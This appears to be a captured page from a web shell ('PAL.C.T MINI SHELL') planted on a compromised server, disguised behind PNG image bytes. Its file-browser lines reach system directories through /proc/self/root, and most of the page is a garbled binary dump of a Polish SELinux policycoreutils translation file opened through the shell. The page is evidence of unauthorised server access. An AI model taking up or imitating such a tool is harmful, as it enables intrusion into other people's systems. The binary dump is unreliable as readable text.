php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /proc/self/root/usr/share/locale/pl/LC_MESSAGES/
upload
files >> //proc/self/root/usr/share/locale/pl/LC_MESSAGES/policycoreutils.mo

,<*h8i8}8888?8;9&O99v99997:?:C:L:`:s::::::::::;+;<;U;/^;;;;;G;E<$M<)r<M<5<) =lJ=)==2=L2>K>>">
?(?!G?'i?D?B?@A@@4A&7A,^A%A2AAKB5MBTB<BLC(bC,CPC2	D.<DJkD%D(D4E:E]VECE(E!F$FF%G-=GLkGxG1H(=HfHH2HHHH2H#I1<I2nII I"IIJAL
L
MMP&MwMM!MM"MN$NCN-`N%N(N1N*O2:O(mOO%O$OO P>P[P"{P$P!PP%Q'Q GQ hQQQ$QQ%R'R$CRhR$R'RRRS+S@SXSuS"SSS S T'T @TaTzT$TT%TTU3UKU#kUUUUU5V7VVV!uV(V!V"V!W&'WNW$hW/W/W4W2"XUX?oX$X)X)X.(Y,WY)Y)Y.Y,Z)4Z)^Z.Z,Z$Z!	[+[)G[q[v[
[[	[	[[[[\\
\-)\(W\)\2\2\-]*>]*i]%]%]*].^,:^/g^$^/^+^-_+F_+r_'_$_,_-`0F`.w`+`0`4a+8a(da)a+a,a+b#<b%`b#b)b,b+c+-c+Yc-c+c-c-
d.;d(jd-d/d.d$ e)Ee)oe.e-e*e*!f/Lf-|f*f.f2g+7g*cg.g*g0g+h-Eh-sh+h-h,h+(i,Ti)i*i)i&j+'j,Sj*j,j,j+k-1k*_k*k*k*k)l*5l%`l/l-l)l&m/5m-em/m&m0m#n-?n-mn*n)n%n+o-Bo+po$o(o*o*p$@p0ep-p*p#p+q/?q3oq.q&q4q+.r.Zr*r+r+r+s,8s+es/s+s)s-t*Et*pt-t/t)t,#u+Pu/|u0u*u)v.2v-av+v,v.v-w)Ew*ow)w)w,w,xHxQx1px:x9xNyfyxyWy	y2yJz<ezz zz"z+{&K{r{+{#{{!{%|<|X|!u| | |F|
 }+}
?}M}k}	~}}
}}	};}"~%~,~0~6~
Q~
\~j~v~4~~~ ~6Jenw	

<#X	|	

Āր	
+G%SGýӁׁہ'@Ym	

ʂς27C8T8ƃ̓փ!9Wv&Ƅ"(HMbЅ
!<Ibo:7ˆ"@DJcp,FJ&:'<GH($ˊ05O6̋ҋqY`~|,*׍'.*3Y42Ž4E*p'*)R|",	'<Xq}*ܑ'"'Jr]
	rUv̓	.$*S~L%C4_<ѕ0!-_1,4֖#,/(\("ė9PlǘϘטߘ"*#G7k$ڙ#"RF$Ûgby1ܜD%SIy4Ý3Ldu)מ""6(U~C ן
 'r0r45Kl?=.lA1WJdԣc9#41'(6P>bƥY)a-F2-(2V9*ècIRxDdZ:Em@9<b%8=O;Ov^8a772M(dv۰	fpQ-
8Q2U%B3%%"K#nr3
(?QH+Ʒ((+T&rF6D7C|:F8B${'2Ⱥ"!"@%c(+&޻",($U&z-ϼ**!C+e&ؽ&+$H1m6&־210*b;/ɿ%61V%2"//4&d0$&*E!p!'H&E'l1<+2/*b/ /87G<: P-i438694p386<I;@>)B+l&-	+7@[+w2,-44b:3/.6)e).203L(3/1
/?/o+(01%4W2/49$/^,-/0/J'z)'-0"/S//1/1E1w2,1	3;2o'--2&1Y..31.O2~;/.2L.4/11E/w11/0;-l.-1/)0Y.00/1K.}...
-9.g)31-&+T313,4G.|11.->)l/1/((,Q5~.(41A.s'/37.2f*8/2-.`///0/P3/-1.D.s1;-0>/o44-	-72e1/02+1^-0--0K0|"AL>kVl+
GdRP'-,-&<T562-Q04!&.NiM,J	\f}	P,(.2"6Y
esG#">: y%
4BJcSi/

+:%K$q
/>GN

$BVgw
"E! BN>a8



$:MG))"3@ U(v C%	5/e'#
=Kg}TW/X(3L)R@|@(A'Ni('7R3e7?);AX#"&5kF9E"ChDBD4Ey)0#016(h$"&
	$	A	W	&w	3		)	<
V
qm


~"Q$D^3e7
OK
g
k
.t

<
JK1h|%7:]7*6<2Lo&1/*E%p&1,-%Jpy#/#
D1v
''(Nk	je~a!l@1CIc&jh'2,;<B(0F]4po%=vs(9/l{y%bC1iCX:$%|ffTHK@7IQ
GH
)s)W&3m.DI]T"vAh5 66F
a
k80uu|RY'*$4zOe !mG8beZq^wS!|YZ
sJzKi5kO(-
Gw*.VUE>;JczV-}=E\PY-+{P1$p<dX,Rg2t[rqU`g<@j^QwS_J+}yFxqyD	B ?xr0i~n_MaK.Tl~v>Sn:UfA+rNn3B_[9)`"dERW]LO5g8?pt\*`bhH>c3N[xu?}6#DM2ZQPo#M#Ad'4o/=/^7\	W,":LtVX;m&L{79%s changed labels.
%s is already in %s%s is not a valid context
%s is not in %s%s must be a directory%s!  Could not get current context for %s, not relabeling tty.
%s!  Could not get new context for %s, not relabeling tty.
%s!  Could not set new context for %s
%s:  Can't load policy and enforcing mode requested:  %s
%s:  Can't load policy:  %s
%s:  Policy is already loaded and initial load requested
******************** IMPORTANT ***********************
...600-1024<b>Applications</b><b>Login Users</b><b>Root Users</b><b>Select:</b><b>TCP Ports</b><b>UDP Ports</b>AddAdd %sAdd Booleans DialogAdd File ContextAdd Network PortAdd SELinux Login MappingAdd SELinux Network PortsAdd SELinux UserAdd SELinux User MappingAdd UserAddr %s is defined in policy, cannot be deletedAddr %s is not definedAdminAdmin User RoleAllAllow SELinux webadm user to manage unprivileged users home directoriesAllow SELinux webadm user to read unprivileged users home directoriesAllow Samba to share nfs directoriesAllow Spam Assassin daemon network accessAllow X-Windows server to map a memory region as both executable and writableAllow all daemons the ability to use unallocated ttysAllow all daemons to write corefiles to /Allow cdrecord to read various content. nfs, samba, removable devices, user temp and untrusted content filesAllow clients to write to X shared memoryAllow daemons to run with NISAllow evolution and thunderbird to read user filesAllow gadmin SELinux user account to execute files in home directory or /tmpAllow guest SELinux user account to execute files in home directory or /tmpAllow java executable stackAllow mount to mount any directoryAllow mount to mount any fileAllow mplayer executable stackAllow normal user to execute pingAllow pppd to be run for a regular userAllow privileged utilities like hotplug and insmod to run unconfinedAllow programs to read files in non-standard locations (default_t)Allow rc scripts to run unconfined, including any daemon started by an rc script that does not have a domain transition explicitly definedAllow regular users direct mouse access (only allow the X server)Allow rpm to run unconfinedAllow sasl authentication server to read /etc/shadowAllow spamd to access home directoriesAllow squid daemon to connect to the networkAllow ssh logins as sysadm_r:sysadm_tAllow ssh to run from inetd instead of as a daemonAllow ssh to run ssh-keysignAllow staff SELinux user account to execute files in home directory or /tmpAllow staff Web Browsers to write to home directoriesAllow staff_r users to search the sysadm home dir and read files (such as ~/.bashrc)Allow stunnel daemon to run as standalone, outside of xinetdAllow sysadm SELinux user account to execute files in home directory or /tmpAllow sysadm_t to directly start daemonsAllow the mozilla browser to read user filesAllow unconfined SELinux user account to execute files in home directory or /tmpAllow unconfined to dyntrans to unconfined_execmemAllow unlabeled packets to flow on the networkAllow user SELinux user account to execute files in home directory or /tmpAllow user to connect to mysql socketAllow user to connect to postgres socketAllow user to r/w noextattrfile (FAT, CDROM, FLOPPY)Allow user to stat ttyfilesAllow user_r to reach sysadm_r via su, sudo, or userhelper. Otherwise, only staff_r can do soAllow users to control network interfaces (also needs USERCTL=true)Allow users to execute the mount commandAllow users to run TCP servers (bind to ports and accept connection from the same domain and outside users)  disabling this forces FTP passive mode and may change other protocolsAllow users to run the dmesg commandAllow users to rw usb devicesAllow xdm logins as sysadm_r:sysadm_tAllow xen to read/write physical disk devicesAllow xguest SELinux user account to execute files in home directory or /tmpAllow xinetd to run unconfined, including any services it starts that do not have a domain transition explicitly definedApplicationAre you sure you want to delete %s '%s'?Bad format %s: Record %sBooleanBoolean %s is defined in policy, cannot be deletedBoolean %s is not definedBoolean NameCVSCan not combine +/- with other types of categoriesCan not have multiple sensitivitiesCan not modify sensitivity levels using '+' on %sCannot find your entry in the shadow passwd file.
Cannot read policy store.Change process mode to enforcingChange process mode to permissive.Changing the policy type will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?Changing to SELinux disabled requires a reboot.  It is not recommended.  If you later decide to turn SELinux back on, the system will be required to relabel.  If you just want to see if SELinux is causing a problem on your system, you can go to permissive mode which will only log errors and not enforce SELinux policy.  Permissive mode does not require a reboot    Do you wish to continue?Changing to SELinux enabled will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?CompatibilityConfigue SELinuxContextCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Could not add SELinux user %sCould not add addr %sCould not add file context for %sCould not add interface %sCould not add login mapping for %sCould not add port %s/%sCould not add prefix %s for %sCould not add role %s for %sCould not check if SELinux user %s is definedCould not check if addr %s is definedCould not check if boolean %s is definedCould not check if file context for %s is definedCould not check if interface %s is definedCould not check if login mapping for %s is definedCould not check if port %s/%s is definedCould not close descriptors.
Could not commit semanage transactionCould not create SELinux user for %sCould not create a key for %sCould not create a key for %s/%sCould not create addr for %sCould not create context for %sCould not create context for %s/%sCould not create file context for %sCould not create interface for %sCould not create key for %sCould not create login mapping for %sCould not create port for %s/%sCould not create semanage handleCould not delete SELinux user %sCould not delete addr %sCould not delete boolean %sCould not delete file context for %sCould not delete interface %sCould not delete login mapping for %sCould not delete port %s/%sCould not delete the file context %sCould not delete the port %sCould not determine enforcing mode.
Could not establish semanage connectionCould not extract key for %sCould not list SELinux modulesCould not list SELinux usersCould not list addrsCould not list booleansCould not list file contextsCould not list interfacesCould not list local file contextsCould not list login mappingsCould not list portsCould not list roles for user %sCould not list the file contextsCould not list the portsCould not modify SELinux user %sCould not modify addr %sCould not modify boolean %sCould not modify file context for %sCould not modify interface %sCould not modify login mapping for %sCould not modify port %s/%sCould not open file %s
Could not query addr %sCould not query file context %sCould not query file context for %sCould not query interface %sCould not query port %s/%sCould not query seuser for %sCould not query user for %sCould not remove permissive domain %s (remove failed)Could not set MLS level for %sCould not set MLS range for %sCould not set SELinux user for %sCould not set active value of boolean %sCould not set addr context for %sCould not set exec context to %s.
Could not set file context for %sCould not set interface context for %sCould not set mask for %sCould not set message context for %sCould not set mls fields in addr context for %sCould not set mls fields in file context for %sCould not set mls fields in interface context for %sCould not set mls fields in port context for %s/%sCould not set name for %sCould not set permissive domain %s (module installation failed)Could not set port context for %s/%sCould not set role in addr context for %sCould not set role in file context for %sCould not set role in interface context for %sCould not set role in port context for %s/%sCould not set type in addr context for %sCould not set type in file context for %sCould not set type in interface context for %sCould not set type in port context for %s/%sCould not set user in addr context for %sCould not set user in file context for %sCould not set user in interface context for %sCould not set user in port context for %s/%sCould not start semanage transactionCould not test MLS enabled statusCouldn't get default type.
Create/Manipulate temporary files in /tmpCronCurrent Enforcing ModeCustomizedDBUS System DaemonDatabasesDelete %sDelete File ContextDelete Network PortDelete SELinux User MappingDelete UserDescriptionDisable AuditDisable SELinux protection for Cluster ServerDisable SELinux protection for EvolutionDisable SELinux protection for Hal daemonDisable SELinux protection for NIS Password DaemonDisable SELinux protection for NIS Transfer DaemonDisable SELinux protection for NetworkManagerDisable SELinux protection for ThunderbirdDisable SELinux protection for acct daemonDisable SELinux protection for amandaDisable SELinux protection for amavisDisable SELinux protection for apmd daemonDisable SELinux protection for arpwatch daemonDisable SELinux protection for auditd daemonDisable SELinux protection for automount daemonDisable SELinux protection for avahiDisable SELinux protection for bluetooth daemonDisable SELinux protection for canna daemonDisable SELinux protection for cardmgr daemonDisable SELinux protection for ciped daemonDisable SELinux protection for clamd daemonDisable SELinux protection for clamscanDisable SELinux protection for clvmdDisable SELinux protection for comsat daemonDisable SELinux protection for courier daemonDisable SELinux protection for cpucontrol daemonDisable SELinux protection for cpuspeed daemonDisable SELinux protection for crond daemonDisable SELinux protection for cups hplip daemonDisable SELinux protection for cupsd back end serverDisable SELinux protection for cupsd daemonDisable SELinux protection for cupsd_lpdDisable SELinux protection for cvs daemonDisable SELinux protection for cyrus daemonDisable SELinux protection for dbskkd daemonDisable SELinux protection for dbusd daemonDisable SELinux protection for dccdDisable SELinux protection for dccifdDisable SELinux protection for dccmDisable SELinux protection for ddt daemonDisable SELinux protection for devfsd daemonDisable SELinux protection for dhcpc daemonDisable SELinux protection for dhcpd daemonDisable SELinux protection for dictd daemonDisable SELinux protection for distccd daemonDisable SELinux protection for dmesg daemonDisable SELinux protection for dnsmasq daemonDisable SELinux protection for dovecot daemonDisable SELinux protection for entropyd daemonDisable SELinux protection for fetchmailDisable SELinux protection for fingerd daemonDisable SELinux protection for freshclam daemonDisable SELinux protection for fsdaemon daemonDisable SELinux protection for gamesDisable SELinux protection for gpm daemonDisable SELinux protection for gss daemonDisable SELinux protection for hostname daemonDisable SELinux protection for hotplug daemonDisable SELinux protection for howl daemonDisable SELinux protection for http suexecDisable SELinux protection for httpd rotatelogsDisable SELinux protection for hwclock daemonDisable SELinux protection for i18n daemonDisable SELinux protection for imazesrv daemonDisable SELinux protection for inetd child daemonsDisable SELinux protection for inetd daemonDisable SELinux protection for innd daemonDisable SELinux protection for iptables daemonDisable SELinux protection for ircd daemonDisable SELinux protection for irqbalance daemonDisable SELinux protection for iscsi daemonDisable SELinux protection for jabberd daemonDisable SELinux protection for kadmind daemonDisable SELinux protection for klogd daemonDisable SELinux protection for krb5kdc daemonDisable SELinux protection for ktalk daemonsDisable SELinux protection for kudzu daemonDisable SELinux protection for locate daemonDisable SELinux protection for lpd daemonDisable SELinux protection for lrrd daemonDisable SELinux protection for lvm daemonDisable SELinux protection for mailmanDisable SELinux protection for mdadm daemonDisable SELinux protection for monopd daemonDisable SELinux protection for mrtg daemonDisable SELinux protection for mysqld daemonDisable SELinux protection for nagios daemonDisable SELinux protection for named daemonDisable SELinux protection for nessusd daemonDisable SELinux protection for nfsd daemonDisable SELinux protection for nmbd daemonDisable SELinux protection for nrpe daemonDisable SELinux protection for nscd daemonDisable SELinux protection for nsd daemonDisable SELinux protection for ntpd daemonDisable SELinux protection for oddjobDisable SELinux protection for oddjob_mkhomedirDisable SELinux protection for openvpn daemonDisable SELinux protection for pam daemonDisable SELinux protection for pegasusDisable SELinux protection for perdition daemonDisable SELinux protection for portmap daemonDisable SELinux protection for portslave daemonDisable SELinux protection for postfixDisable SELinux protection for postgresql daemonDisable SELinux protection for pptpDisable SELinux protection for prelink daemonDisable SELinux protection for privoxy daemonDisable SELinux protection for ptal daemonDisable SELinux protection for pxe daemonDisable SELinux protection for pyzordDisable SELinux protection for quota daemonDisable SELinux protection for radiusd daemonDisable SELinux protection for radvd daemonDisable SELinux protection for rdiscDisable SELinux protection for readaheadDisable SELinux protection for restorecondDisable SELinux protection for rhgb daemonDisable SELinux protection for ricciDisable SELinux protection for ricci_modclusterdDisable SELinux protection for rlogind daemonDisable SELinux protection for rpcd daemonDisable SELinux protection for rshdDisable SELinux protection for rsync daemonDisable SELinux protection for saslauthd daemonDisable SELinux protection for scannerdaemon daemonDisable SELinux protection for sendmail daemonDisable SELinux protection for setransDisable SELinux protection for setroubleshoot daemonDisable SELinux protection for slapd daemonDisable SELinux protection for slrnpull daemonDisable SELinux protection for smbd daemonDisable SELinux protection for snmpd daemonDisable SELinux protection for snort daemonDisable SELinux protection for sound daemonDisable SELinux protection for soundd daemonDisable SELinux protection for spamd daemonDisable SELinux protection for speedmgmt daemonDisable SELinux protection for squid daemonDisable SELinux protection for ssh daemonDisable SELinux protection for stunnel daemonDisable SELinux protection for swat daemonDisable SELinux protection for sxid daemonDisable SELinux protection for syslogd daemonDisable SELinux protection for system cron jobsDisable SELinux protection for tcp daemonDisable SELinux protection for telnet daemonDisable SELinux protection for tftpd daemonDisable SELinux protection for the web browsersDisable SELinux protection for transproxy daemonDisable SELinux protection for udev daemonDisable SELinux protection for uml daemonDisable SELinux protection for updfstab daemonDisable SELinux protection for uptimed daemonDisable SELinux protection for uucpd daemonDisable SELinux protection for vmware daemonDisable SELinux protection for watchdog daemonDisable SELinux protection for winbind daemonDisable SELinux protection for xdm daemonDisable SELinux protection for xen controlDisable SELinux protection for xen daemonDisable SELinux protection for xfs daemonDisable SELinux protection for ypbind daemonDisable SELinux protection for ypserv daemonDisabledDisabled
Permissive
Enforcing
Do not allow any processes to load kernel modulesDo not allow any processes to modify kernel SELinux policyDo not allow transition to sysadm_t, sudo and su effectedDo not audit things that we know to be broken but which are not security risksEdit Network PortEnable AuditEnable/Disable additional audit rules, that are normally not reported in the log files.EnforcingEnter complete path for executable to be confined.Enter complete path to init script used to start the confined application.Enter unique name for the confined application or user role.Error allocating memory.
Error allocating shell's argv0.
Error changing uid, aborting.
Error connecting to audit system.
Error dropping SETUID capability, aborting
Error dropping capabilities, aborting
Error freeing caps
Error initializing capabilities, aborting.
Error resetting KEEPCAPS, aborting
Error sending audit message.
Error setting KEEPCAPS, aborting
Error setting capabilities, aborting
Error!  Could not open %s.
Error!  Shell is not valid.
Error: multiple levels specified
Error: multiple roles specified
Error: multiple types specified
Error: you are not allowed to change levels on a non secure terminal 
ExecutableExisting User RolesExisting_UserFailed to close tty properly
File
SpecificationFile
TypeFile Contexts fileFile LabelingFile SpecificationFile TypeFile context for %s is defined in policy, cannot be deletedFile context for %s is not definedFilterGPLGamesGenerate new policy moduleGroup ViewHTTPD ServiceInit scriptInteracts with the terminalInterface %s is defined in policy, cannot be deletedInterface %s is not definedInterface fileInternet Services Daemon (inetd)Internet Services Daemon are daemons started by xinetdInvalid file specificationKerberosLabelingLinux Group %s does not existLinux User %s does not existList ViewLoad Policy ModuleLoad policy moduleLockdown...Login
NameLogin '%s' is requiredLogin NameLogin mapping for %s is defined in policy, cannot be deletedLogin mapping for %s is not definedMCS LevelMCS RangeMLSMLS/MLS/
MCS RangeMLS/MCS
LevelMLS/MCS RangeMemory ProtectionMinimal Terminal User RoleMinimal X Windows User RoleModify %sModify File ContextModify SELinux User MappingModify UserModify an existing login user record.Module %s.pp already loaded in current policy.
Do you want to continue?Module NameMountNFSNISNameName ServiceNetwork ConfigurationNetwork PortNo context in file %s
Node Address is requiredNode Netmask is requiredNot yet implementedOptions Error %s Out of memory!
Password:PermissivePolgenPolicy DirectoryPolicy ModulePortPort %s/%s already definedPort %s/%s is defined in policy, cannot be deletedPort %s/%s is not definedPort NumberPort is requiredPort number "%s" is not valid.  0 < PORT_NUMBER < 65536 Ports must be numbers or ranges of numbers from 1 to %d PrefixPrintingProcess DomainProtoProtocolProtocol udp or tcp is requiredRed Hat 2007Relabel on next reboot.Remove loadable policy moduleRequires at least one categoryRequires prefix or rolesRequires prefix, roles, level or rangeRequires setypeRequires setype or serangeRequires setype, serange or seuserRequires seuser or serangeRevert boolean setting to system defaultRoleRoot Admin User RoleRun booleans lockdown wizardSASL authentication serverSELinux
UserSELinux AdministrationSELinux InterfaceSELinux Policy Generation ToolSELinux Port
TypeSELinux Port TypeSELinux RolesSELinux Service ProtectionSELinux TypeSELinux Type is requiredSELinux UserSELinux booleanSELinux fcontextSELinux policy is not managed or store cannot be accessed.SELinux user %s is defined in policy, cannot be deletedSELinux user %s is not definedSELinux user '%s' is requiredSSHSambaSelect Management ObjectSelect PortsSelect Root Administrator User Role, if this user will be used to administer the machine while running as root.  This user will not be able to login to the system directly.Select directory to generate policy files inSelect directory(s) that the confined application owns and writes intoSelect executable file to be confined.Select file(s) that confined application creates or writesSelect if you wish to relabel then entire file system on next reboot.  Relabeling can take a very long time, depending on the size of the system.  If you are changing policy types or going from disabled to enforcing, a relabel is required.Select init script file to be confined.Select the domains that you would like this user administer.Select the user roles that will transiton to this applications domains.Selinux
File TypeSemanage transaction already in progressSemanage transaction not in progressSends audit messagesSends emailSetup ScriptSorry, -l may be used with SELinux MLS support.
Sorry, newrole may be used only on a SELinux kernel.
Sorry, run_init may be used only on a SELinux kernel.
Spam ProtectionSquidStandard Init DaemonStandard Init Daemon are daemons started on boot via init scripts.  Usually requires a script in /etc/rc.d/init.dStatusSystem Default Enforcing ModeSystem Default Policy Type: This user can login to a machine via X or terminal.  By default this user will have no setuid, no networking, no sudo, no suThis user will login to a machine only via a terminal or remote login.  By default this user will have  no setuid, no networking, no su, no sudo.To make this policy package active, execute:Toggle between Customized and All BooleansToggle between Customized and All PortsToggle between all and customized file contextTransition staff SELinux user to Web Browser DomainTransition sysadm SELinux user to Web Browser DomainTransition user SELinux user to Web Browser DomainTransition xguest SELinux user to Web Browser DomainType %s_t already defined in current policy.
Do you want to continue?Type Enforcement fileType is requiredUSAGE: run_init <script> <args ...>
  where: <script> is the name of the init script to run,
         <args ...> are the arguments to that script.USER Types automatically get a tmp typeUnable to allocate memory for new_contextUnable to clear environment
Unable to obtain empty signal set
Unable to restore the environment, aborting
Unable to restore tty label...
Unable to set SIGHUP handler
Universal SSL tunnelUnknown or missing protocolUnreserved Ports (>1024)Usage %s -LUsage %s -L -l userUsage %s -d File ...Usage %s -l -d user ...Usage %s -l CATEGORY user ...Usage %s -l [[+|-]CATEGORY],...]q user ...Usage %s CATEGORY File ...Usage %s [[+|-]CATEGORY],...]q File ...Use -- to end option list.  For exampleUser ApplicationUser Application are any application that you would like to confine that is started by a userUser MappingUser PrivsUser RoleUser with full networking, no setuid applications without transition, no su, can sudo to Root Administration RolesUser with full networking, no setuid applications without transition, no sudo, no su.Uses Pam for authenticationUses dbusUses nsswitch or getpw* callsVerify NameVersionWarning!  Could not retrieve tty information.
Warning! Could not restore context for %s
Web Application/Script (CGI)Web ApplicationsWeb Applications/Script (CGI) CGI scripts started by the web server (apache)Writes syslog messages	XENXServerYou must add at least one role for %sYou must enter a executableYou must enter a name for your confined process/userYou must enter the executable path for your confined processYou must select a userYou must specify one of the following values: %s_Delete_Propertiesallall files
regular file
directory
character device
block device
socket
symbolic link
named pipe
authentication failed.
cannot find valid entry in the passwd file.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererror on reading PAM service configuration.
failed to build new range with level %s
failed to convert new context to string
failed to exec shell
failed to get account information
failed to get new context.
failed to get old_context.
failed to initialize PAM
failed to set PAM_TTY
failed to set new range %s
failed to set new role %s
failed to set new type %s
getpass cannot open /dev/tty
globallabel37label38label39label41label42label44label50label59newrole:  %s:  error on line %lu.
newrole: failure forking: %snewrole: incorrect password for %s
newrole: service name configuration hashtable overflow
offonpppdrsyncrun_init: incorrect password for %s
system-config-selinuxtranslator-creditstypeunknownusage:  %s [-qi]
use_syslog must be a boolean value Project-Id-Version: pl
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2014-10-17 23:48+0000
PO-Revision-Date: 2010-07-14 17:38+0200
Last-Translator: Piotr Drąg <piotrdrag@gmail.com>
Language-Team: Polish <trans-pl@lists.fedoraproject.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: pl
%s zmieniło etykiety.
%s jest już w %s%s nie jest prawidłowym kontekstem
%s nie jest w %s%s musi być katalogiem%s. Nie można uzyskać bieżącego kontekstu dla %s, ponowne nadanie etykiety TTY nie odbędzie się.
%s. Nie można uzyskać nowego kontekstu dla %s, ponowne nadanie etykiety TTY nie odbędzie się.
%s.! Nie można ustawić nowego kontekstu dla %s
%s: nie można wczytać zażądanej polityki i trybu wymuszania: %s
%s: nie można wczytać polityki: %s
%s: polityka została już wczytana i zażądano początkowego wczytania
******************** WAŻNE ***********************
...600-1024<b>Aplikacje</b><b>Logowani użytkownicy</b><b>Użytkownicy root</b><b>Proszę wybrać:</b><b>Porty TCP</b><b>Porty UDP</b>DodajDodaj %sOkno dialogowe dodania zmiennej logicznejDodanie kontekstu plikuDodanie portu sieciowegoDodanie mapowania loginu SELinuksaDodanie portów sieciowe SELinuksaDodanie użytkownika SELinuksaDodanie mapowania użytkownika SELinuksaDodanie użytkownikaAdres %s został określony w polityce, nie może zostać usuniętyAdresu %s nie został określonyAdministracjaRola użytkownika administratoraWszystkoPozwolenie użytkownikowi SELinuksa webadm na zarządzanie katalogami domowymi nieuprzywilejowanych użytkownikówPozwolenie użytkownikowi SELinuksa webadm na odczytywanie katalogów domowych nieuprzywilejowanych użytkownikówPozwolenie Sambie na współdzielenie katalogów NFSPozwolenie demonowi Spam Assassin na dostęp do sieciPozwolenie serwerowi X Window na mapowanie regionów pamięci zarówno jako wykonywalną, jak i zapisywalnąPozwolenie wszystkim demonom na używanie nieprzydzielonych TTYPozwolenie wszystkim demonom na zapisywanie plików core do /Pozwolenie cdrecord na odczytywanie różnej zawartości. NFS, Samba, urządzenia wymienne, pliki tymczasowe użytkownika i potencjalnie niebezpieczne pliki zawartościPozwolenie klientom na zapisywanie do współdzielonej pamięci XPozwolenie demonom na uruchamianie za pomocą NISPozwolenie Evolution i Thunderbirdowi na odczytywanie plików użytkownikaPozwolenie kontom użytkowników SELinuksa gadmin na wykonywanie plików w katalogu domowym lub /tmpPozwolenie kontom użytkowników SELinuksa guest na wykonywanie plików w katalogu domowym lub /tmpZezwolenie na stos wykonywalny JavyPozwolenie mount na montowanie wszystkich katalogówPozwolenie mount na montowanie wszystkich plikówZezwolenie na stos wykonywalny MPlayeraPozwolenie normalnym użytkownikom na wykonywanie pingPozwolenie pppd na uruchamianie przez zwykłych użytkownikówPozwolenie uprzywilejowanym narzędziom, takim jak hotplug i insmod na uruchamianie nieograniczanePozwolenie programom na odczytywanie plików w niestandardowych położeniach (default_t)Pozwolenie skryptom rc na uruchamianie nieograniczane, w tym wszystkie demony uruchamiane przez skrypty rc, a które nie mają określonych przemian domenPozwolenie zwykłym użytkownikom na bezpośredni dostęp do myszy (pozwolenie tylko serwerowi X)Pozwolenie RPM na uruchamianie nieograniczanePozwolenie serwerowi uwierzytelniania SASL na odczytywanie /etc/shadowPozwolenie smapd na dostęp do katalogów domowychPozwolenie demonowi Squid na dostęp do sieciPozwolenie SSH na logowanie jako sysadm_r:sysadm_tPozwolenie SSH na uruchamianie z inetd zamiast jako demonPozwolenie SSH na uruchamianie ssh-keysignPozwolenie kontom użytkowników SELinuksa staff na wykonywanie plików w katalogu domowym lub /tmpPozwolenie przeglądarkom WWW staff na zapisywanie do katalogów domowychPozwolenie użytkownikom staff_r na wyszukiwanie w katalogu domowym sysadm i odczytywanie plików (takich jak ~/.bashrc)Pozwolenie demonowi stunnel na samodzielne uruchamianie, poza xinetdPozwolenie kontom użytkowników SELinuksa sysadm na wykonywanie plików w katalogu domowym lub /tmpPozwolenie sysadm_t na bezpośrednie uruchamianie demonówPozwolenie przeglądarce Mozilla na odczytywanie plików użytkownikaPozwolenie nieograniczanym kontom użytkowników SELinuksa na wykonywanie plików w katalogu domowym lub /tmpPozwolenie nieograniczanym dyntrans do unconfined_execmemPozwolenie pakietom bez etykiet na przepływanie przez siećPozwolenie kontom użytkowników SELinuksa user na wykonywanie plików w katalogu domowym lub /tmpPozwolenie użytkownikowi na łączenie z gniazdem MySQLPozwolenie użytkownikowi na łączenie z gniazdem PostgreSQLPozwolenie użytkownikom na odczyt/zapis noextattrfile (FAT, CD-ROM, DYSKIETKA)Pozwolenie użytkownikom na wykonywanie stat na plikach TTYPozwolenie user_r na osiąganie sysadm_r przez su, sudo lub userhelper. W innym wypadku tylko staff_r może to zrobićPozwolenie użytkownikom na kontrolowanie interfejsów sieciowych (wymaga także USERCTL=true)Pozwolenie użytkownikom na uruchamianie polecenia mountPozwolenie użytkownikom na uruchamianie serwerów TCP (dowiązanie do portów i akceptowanie połączenia z tych samych domen i zewnętrznych użytkowników) wyłączenie tego wymusza tryb pasywny FTP i może zmienić inne protokołyPozwolenie użytkownikom na wykonywanie polecenia dmesgPozwolenie użytkownikom na odczyt/zapis urządzeń USBPozwolenie XDM na logowanie jako sysadm_r:sysadm_tPozwolenie Xenowi na odczytywanie/zapisywanie fizycznych urządzeń dyskowychPozwolenie kontom użytkowników SELinuksa xguest na wykonywanie plików w katalogu domowym lub /tmpPozwolenie xinetd na uruchamianie nieograniczane, w tym wszystkich usług, jakie uruchamia, a które nie mają określonych przemian domenAplikacjaNa pewno usunąć %s "%s"?Błędny format %s: wpis %sZmienna logicznaWartość logiczna %s została określona w polityce, nie może zostać usuniętaWartość logiczna %s nie została określonaNazwa zmiennej logicznejCVSNie można łączyć +/- z innymi typami kategoriiNie można posiadać wielu czułościNie można zmodyfikować poziomów czułości używając "+" na %sNie można odnaleźć wpisu w pliku passwd shadow.
Nie można odczytać składu polityk.Zmiana trybu procesu na wymuszanieZmiana trybu procesu na zezwalanie.Zmienianie typu polityki spowoduje ponowne nadanie etykiet całemu systemowy plików podczas następnego uruchamiania. Ponowne nadawanie etykiet zajmuje dużo czasu, w zależności od rozmiaru systemu plików. Kontynuować?Zmienianie SELinuksa na wyłączony wymaga ponownego uruchomienia. Nie jest to zalecane. Jeśli później SELinux zostanie ponownie włączony, system będzie wymagał ponownego nadania etykiet. Aby tylko zobaczyć, czy SELinux powoduje problem z systemem, można przejść do trybu zezwalania, który będzie tylko zapisywał błędy do dziennika i nie wymuszał polityki SELinuksa. Tryb zezwalania nie wymaga ponownego uruchomienia. Kontynuować?Zmienianie SELinuksa na włączony spowoduje ponowne nadanie etykiet całemu systemowy plików podczas następnego uruchamiania. Ponowne nadawanie etykiet zajmuje dużo czasu, w zależności od rozmiaru systemu plików. Kontynuować?ZgodnośćKonfiguracja SELinuksaKontekstCopyright (c) 2006 Red Hat, Inc.
